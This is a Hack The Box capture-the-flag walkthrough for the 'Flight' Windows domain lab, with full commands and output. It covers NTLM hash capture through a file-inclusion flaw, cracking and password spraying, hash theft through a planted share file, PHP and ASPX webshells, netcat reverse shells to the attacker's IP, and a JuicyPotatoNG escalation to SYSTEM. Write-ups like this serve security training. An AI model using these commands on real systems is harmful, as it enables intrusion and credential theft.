HTB - Flight
Machine Info
Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as low privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account, he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack ultimately obtaining the hashes for the Administrator user or abuse SeImpersonatePrivilege privilege to gain SYSTEM account.
Enumeration
Scope
IP Address: 10.10.11.187
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-20 10:26:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-20T10:28:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m03s* Open ports:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - LDAP - LDAPS - winRM
* Versions: Apache httpd 2.4.52 - PHP/8.1.1
* Important notes: Domain: flight.htbI started to collect subdomain of the webapp since there is web server listening on port 80
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Hos
t: FUZZ.flight.htb" -fs 7069
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 113ms] Update /etc/hosts file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo sh -c "echo '$ip flight.htb school.flight.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.187 flight.htb school.flight.htDNS Enumeration
I tried to transfer zone from DNS but nothing
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr flight.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr school.flight.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr school.flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.RPC Enumeration
Access denied in rpc
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIEDSMB Enumeration
Nothing also from smb
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.187 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\:
SMB 10.10.11.187 445 G0 [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.11.187 445 G0 [-] flight.htb\guest: STATUS_ACCOUNT_DISABLED KERBEROS Enumeration
I started kerbrute to get at least valid usernames but with no luck.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/MultiMasters]
└─$ kerbrute userenum --dc $ip -d flight.htb -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/19 23:40:57 > Done! Tested 48705 usernames (0 valid) in 51.969 secondsLDAP Enumeration
No info from ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ldapsearch -H ldap://$ip -x -b "DC=FLIGHT,DC=HTB" -s sub '*'
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563HTTP Enumeration
http://10.10.11.187/
It's a static website and when fuzzing directory, I didn't find anything, So I went to explore school.flight.htb subdomain I found before.
http://school.flight.htb/
Shell as svc_apache
The webapp includes files in view parameter http://school.flight.htb/index.php?view=about.html
I tried to include local file with these payloads but without luck:
C:\Windows\System32\drivers\etc\hosts
..\..\..\Windows\System32\drivers\etc\hosts
./../../../Windows/System32/drivers/etc/hostsHowever, C:/windows/system32/drivers/etc/hosts worked
I thought it's worth nothing to test for RFI, So I started a local smb server and visit /index.php?view=///10.10.16.7/share, then I got a NTLMv2 hash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .
[*] Incoming connection (10.10.11.187,49850)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000The hash was cracked successfully
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: CrackedAfter getting valid credentials, I will do the following:
Explore the shares for interesting files with
spider_plusmodule withCMEEnumerate the domain with
rpcclient&bloodhound.py
bloodhound.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ bloodhound-python -u 'svc_apache' -p 'S@Ss!K@*t13' -ns $ip -d flight.htb -c all --zip
<snip>
INFO: Done in 00M 14S
INFO: Compressing output into 20240720003141_bloodhound.ziprpcclient to get domain users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rpcclient -U 'svc_apache%S@Ss!K@*t13' $ip -c enumdomusers | tee -a users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[S.Moon] rid:[0x642]
user:[R.Cold] rid:[0x643]
user:[G.Lors] rid:[0x644]
user:[L.Kein] rid:[0x645]
user:[M.Gold] rid:[0x646]
user:[C.Bum] rid:[0x647]
user:[W.Walker] rid:[0x648]
user:[I.Francis] rid:[0x649]
user:[D.Truff] rid:[0x64a]
user:[V.Stevens] rid:[0x64b]
user:[svc_apache] rid:[0x64c]
user:[O.Possum] rid:[0x64d]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ cat users.txt | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.PossumI tried ASREPROASTING against these users but no luck :(
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-GetNPUsers FLIGHT.HTB/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
<snip>
[-] User C.Bum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User W.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User I.Francis doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>I tried then to spray the password of the user svc_apache and see if it's reused by another user
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE I found no interesting files when enumerating the shares as svc_apache, So I tried to enumerate them with S.Moon
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ S.Moon has write access the Shared share folder, So I can but a malicious .scf or .lnk files to get NTLMv2 of the user that enter that share
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ I mounted the Shared folder to my kali machine for easy exploring
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\Shared" ./shared -o "username=S.Moon,password=S@Ss\!K@*t13" I tried to drop multiple files but it seems like there is a group policy that prevent specific file extensions
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.scf
touch: cannot touch 'file.scf': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.lnk
touch: cannot touch 'file.lnk': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ico
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.exe
touch: cannot touch 'file.exe': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.bat
touch: cannot touch 'file.bat': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.dll
touch: cannot touch 'file.dll': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.txt
touch: cannot touch 'file.txt': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.iniShell as c.bum
.ico & .ini worked for me, So I used this post to create .ini file as I don't know the structure that should be written with
There is also a tool that can create multiple files that can be dropped:
https://github.com/Greenwolf/ntlm_theft
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .
c.bum::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:Tikkycoll_431012284
Session..........: hashcat
Status...........: Cracked┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [+] flight.htb\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 Node C.BUM@FLIGHT.HTB successfully set as owned in BloodHoundC.BUM is a member of web development group, So I think it has a write permission on the web folder we saw before.
As I guessed :)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE I mounted the share as C.BUM user
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\web" ./web -o 'username=C.BUM,password=Tikkycoll_431012284'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ls -al web
total 4
drwxr-xr-x 2 root root 0 Jul 20 2024 .
drwxrwxr-x 5 kali kali 4096 Jul 20 01:23 ..
drwxr-xr-x 2 root root 0 Jul 20 2024 flight.htb
drwxr-xr-x 2 root root 0 Jul 20 2024 school.flight.htbI tried to put .php file and it worked, So I will then try to upload a webshell
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# touch file.php
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# ls
about.html blog.html file.php home.html images index.php lfi.html styles
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# cp ..\p0wny.php .http://school.flight.htb/p0wny.php
The webshell doesn't persist maybe there is a clean up script. I will upload nc.exe and send a shell to my kali machine
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50122
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\school.flight.htb> I wanted to get a shell as C.Bum also, So I uploaded RunasCs.exe and send connection back to my kali machine
PS C:\users\Public> .\RunasCs.exe C.BUM Tikkycoll_431012284 Powershell -r 10.10.16.7:8443
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58a5e$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2364 created in background.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50150
PS C:\Windows\system32> whoami
flight\c.bumGet the user flag
PS C:\Users\C.Bum> type Desktop\user.txt
ed94451f15400f9a656xxxxxxxxxxxxxxxxUser Flag: ed94451f15400f9axxxxxxxxxxxxx
Looking at listening ports, non-default port is there.
PS C:\Users\C.Bum> netstat -ano | findstr TCP[33/49227]
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5636
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5636
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4 Confirm webapp existence
PS C:\Users\C.Bum> curl http://127.0.0.1:8000 -UseBasicParsing
StatusCode : 200
StatusDescription : OK
Content : <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> I will then map this port locally on my kali with Chisel
┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
2024/07/20 02:22:44 server: Reverse tunnelling enabled
2024/07/20 02:22:44 server: Fingerprint zWfxqSWqKl2N1LrFVrpM+V7q9qqtfuYJ5NCiPneI7eM=
2024/07/20 02:22:44 server: Listening on http://0.0.0.0:9001PS C:\users\Public> .\chisel.exe client 10.10.16.7:9001 R:8888:127.0.0.1:8000
.\chisel.exe client 10.10.16.7:9001 R:8888:localhost:8000
2024/07/20 06:23:04 client: Connecting to ws://10.10.16.7:9001
2024/07/20 06:23:05 client: Connected (Latency 64.1406ms)Connected with windows machine
┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
<snip>
2024/07/20 02:43:21 server: session#1: tun: proxy#R:8888=>8000: ListeningThere is a webapp running on IIS 10.0
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nmap -p8888 localhost -sCV
PORT STATE SERVICE VERSION
8888/tcp open http Microsoft IIS httpd 10.0
|_http-title: Flight - Travel and Tour
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0http://localhost:8888/
Shell as defaultapppool
PS C:\inetpub> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2022 12:24 PM custerr
d----- 7/20/2024 6:57 AM development
d----- 9/22/2022 1:08 PM history
d----- 9/22/2022 12:32 PM logs
d----- 9/22/2022 12:24 PM temp
d----- 9/22/2022 12:28 PM wwwroot There is development folder and C.BUM has full access on it
PS C:\inetpub> icacls development
development flight\C.Bum:(OI)(CI)(W)
<snip>So, I can write a webshell to that folder.
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
I downloaded the shell to my kali and then uploaded it to the windows box
PS C:\inetpub\development> curl 10.10.16.7/cmd.aspx -o .\cmd.aspxhttp://localhost:8888/cmd.aspx
Get a Shell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppoolShell as Administrator
PS C:\Users\Public> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
<snip>
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledSince I have SeImpersonatePrivilege, I can escalate to SYSTEM using JoicyPotato-ng
PS C:\Users\Public> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\nc.exe" -a "10.10.16.7 5555 -e PowerShell"┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50363
PS C:\> whoami
nt authority\systemPS C:\> type C:\Users\Administrator\Desktop\root.txt
a884480417f1f666bf6xxxxxxxxxxxxxxRoot Flag: a884480417f1f666xxxxxxxxxxxx
Last updated